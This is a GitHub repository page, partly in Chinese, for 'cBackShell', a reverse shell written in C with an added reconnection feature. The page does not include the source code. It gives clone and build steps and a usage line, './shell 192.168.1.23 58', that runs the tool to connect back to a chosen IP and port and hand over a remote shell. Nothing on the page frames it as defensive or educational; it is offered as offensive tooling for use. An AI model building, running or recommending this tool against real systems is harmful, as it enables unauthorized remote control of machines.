badboycxcc / cBackShell

c语言版本的反弹shell

Repository from Github https://github.combadboycxcc/cBackShellRepository from Github https://github.combadboycxcc/cBackShell

c语言版本的 反弹shell

加入重连机制

用法:

git clone https://github.com/badboycxcc/cBackShell.git
make 
./shell 192.168.1.23  58

说明:

 ./shell 192.168.1.23  58 
Usage: ./shell <reflect ip> <port> 

About

c语言版本的反弹shell


Languages

Language:C 95.8%Language:Makefile 4.2%